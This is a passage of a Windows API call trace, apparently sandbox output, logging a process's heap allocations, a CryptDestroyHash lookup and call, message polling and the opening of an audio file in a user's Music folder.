(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0254.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0254.295] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0254.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0254.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0254.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0254.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0254.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0254.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.297] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0254.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0254.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.297] CryptDestroyHash (hHash=0xaa5760) returned 1 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0254.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0254.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.300] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0254.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0254.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0254.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0254.303] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.304] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0254.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0254.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0254.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0254.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0254.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0254.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0254.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0254.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0254.307] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xep-i8.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0254.308] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.308] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0254.308] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0254.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 